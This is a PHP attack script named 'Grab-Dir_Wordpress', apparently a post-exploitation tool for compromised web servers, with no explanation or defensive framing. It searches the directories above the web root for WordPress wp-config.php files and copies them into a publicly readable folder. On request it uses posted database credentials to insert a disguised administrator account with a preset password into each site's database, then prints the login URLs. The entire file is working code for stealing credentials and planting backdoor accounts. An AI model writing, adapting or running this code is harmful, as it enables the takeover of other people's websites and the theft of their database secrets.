Grab-Dir_Wordpress

1. <?php
2. error_reporting(0);
3. set_time_limit(0);
4. @ini_set('memory_limit','256M');
5.  
6.  
7. function query($connect, $prefix, $user) {
8.     try{
9.         $id = rand(80, 600);
10.  
11.  
12.         $query1 = mysqli_query($connect, "SELECT * FROM " . $prefix . "options where option_name='siteurl'");
13.         while ($siteurl = mysqli_fetch_array($query1)) {
14.             $site_url = $siteurl['option_value'];
15.         }
16.  
17.         $query2 = mysqli_query($connect, "INSERT INTO " . $prefix . "users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES ( " . $id . ", '" . $user . "','b69d8af222106f687d7a086c24232387','" . $user . "','support@wordpress.org','','2011-06-07 00:00:00','','0','" . $user . "');");
18.         $sql1 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}');");
19.         $sql2 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'wp_user_level','10');");
20.         $sql3 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'" . $prefix . "capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}');");
21.         $sql4 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'" . $prefix . "user_level','10');");
22.         if ($query1 && $query2 && $sql1 && $sql2) {
23.             echo "$site_url/wp-login.php," . $user . ",StrongPass154$$\n";
24.         }
25.         // else{
26.         //     echo $site_url;
27.         // }
28.     }catch (Exception $e){
29.         // do nothing... php will ignore and continue    
30.     }
31. }
32.  
33. if (isset($_GET['change'])) {
34.     $lines = explode("\n", $_POST['config']);
35.     foreach ($lines as $line) {
36.         try{
37.             $data   = explode(',', $line);
38.  
39.             $host   = $data[0];
40.             $user   = $data[1];
41.             $pass   = $data[2];
42.             $name   = $data[3];
43.             $prefix = $data[4];
44.             //  echo $host .' '. $user .' '. $pass .' '. $name;
45.  
46.             $connect = mysqli_connect($host, $user, $pass, $name);
47.             if ($connect) {
48.  
49.                 $check_availability = mysqli_query($connect, "SELECT * FROM " . $prefix . "users WHERE (user_login = 'Administrator' OR user_login = 'Wpadmin') AND (user_pass = 'b69d8af222106f687d7a086c24232387' OR user_pass = '\$P\$B/BHu2715erD4cr2tF0p5QXanN6PqS1');");
50.  
51.                 if (mysqli_num_rows($check_availability) < 1) {
52.                     query($connect, $prefix, 'Administrator');
53.                 }
54.                 mysqli_close($connect);
55.             }
56.         }catch (Exception $e){
57.             // do nothing... php will ignore and continue    
58.         }
59.  
60.     }
61.  
62.     die();
63. }
64.  
65. function file_get_contents_utf8($fn) {
66.      $content = file_get_contents($fn);
67.       return mb_convert_encoding($content, 'UTF-8',
68.           mb_detect_encoding($content, 'UTF-8, ISO-8859-1', true));
69. }
70.  
71. function save($filename, $mode, $file) {
72.       $handle = fopen($filename, $mode);
73.       fwrite($handle, $file);
74.       fclose($handle);
75.       return;
76. }
77.  
78. function go($m_dir, $p) {
79.     global $script;
80.     @mkdir('wp_dir', 0755);
81.     $htaccess = "Options all\nDirectoryIndex doesntexist.htm\nSatisfy Any";
82.     save("wp_dir/.htaccess","w", $htaccess);
83.  
84.     if ($p == '../../') {
85.         $depth = 6;
86.     }elseif ($p == '../') {
87.         $depth = 5;
88.     }else {
89.         $depth = 4;
90.     }
91.     $dir = new RecursiveDirectoryIterator($m_dir . $p, RecursiveDirectoryIterator::SKIP_DOTS);
92.     $iterator = new RecursiveIteratorIterator($dir);
93.     $iterator->setMaxDepth($depth);
94.     $n = 0;
95.     foreach ($iterator as $file) {
96.         // echo $file . PHP_EOL;
97.         $n += 1;
98.         if ($file->getBaseName() == 'wp-config.php') {
99.             if (is_readable($file)) {
100.                 $file_data = file_get_contents_utf8($file);
101.                 $p = "Wordpress-$n.txt";
102.                 echo $p . PHP_EOL;
103.                 $fopen = fopen("wp_dir/$p", "w");
104.                 fputs($fopen, $file_data);
105.                 $flag = true;
106.             }
107.         }
108.     }
109.     if ($flag) {
110.         echo "aofhnjkq198a";
111.     }
112. }
113.  
114. $doc_r = str_replace("//", "/", str_replace("\\", "/", $_SERVER['DOCUMENT_ROOT'])).'/';
115.  
116. if (is_readable($doc_r . '../../')) {
117.     go($doc_r, '../../');
118. }elseif (is_readable($doc_r . '../')) {
119.     go($doc_r, '../');
120. }else{
121.     go($doc_r, '');
122. }
123.  
124. ?>